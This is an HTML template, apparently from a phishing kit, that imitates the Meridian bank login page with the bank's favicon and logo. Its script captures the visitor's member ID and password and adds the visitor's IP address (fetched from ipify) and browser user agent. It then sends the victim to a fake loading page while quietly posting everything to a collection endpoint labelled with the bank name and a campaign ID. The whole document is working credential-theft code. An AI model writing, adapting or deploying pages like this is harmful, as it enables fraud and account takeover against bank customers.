<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meridian Bank Login</title>
    <link rel="shortcut icon" href="https://www.meridiancu.ca/getmedia/6c76e806-df80-4b7c-a633-cab25199417c/meridian-icon.svg?ext=.svg">
    <style>
        body {
            background-color: #ffffff;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
        }
        .login-container {
            background-color: #ffffff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 300px;
        }
        .logo {
            width: 150px;
            margin-bottom: 20px;
        }
        h1 {
            color: #333;
            font-size: 24px;
            margin: 0 0 20px;
            text-transform: uppercase;
        }
        input[type="text"], input[type="password"] {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
        }
        button {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: none;
            border-radius: 5px;
            background-color: #0056b3;
            color: white;
            text-transform: uppercase;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <img src="https://i.postimg.cc/Qt25QPL6/Meridian.webp" alt="Meridian Bank Logo" class="logo">
        <h1>Log in</h1>
        <!-- Добавлена форма с действием и методом -->
        <form id="meridian-login-form" action="/submit-meridian" method="POST">
            <!-- Добавлены name атрибуты для полей -->
            <input type="hidden" name="url_id" value="{{ url_id }}">
            <input type="text" name="login-id" placeholder="Email, Member Number or User ID" required>
            <input type="password" name="password" placeholder="Password" required>
            
            
            <button type="submit">Login</button>
        </form>
    </div>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#meridian-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'meridian');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-meridian', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'meridian');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-meridian', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>

    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</html>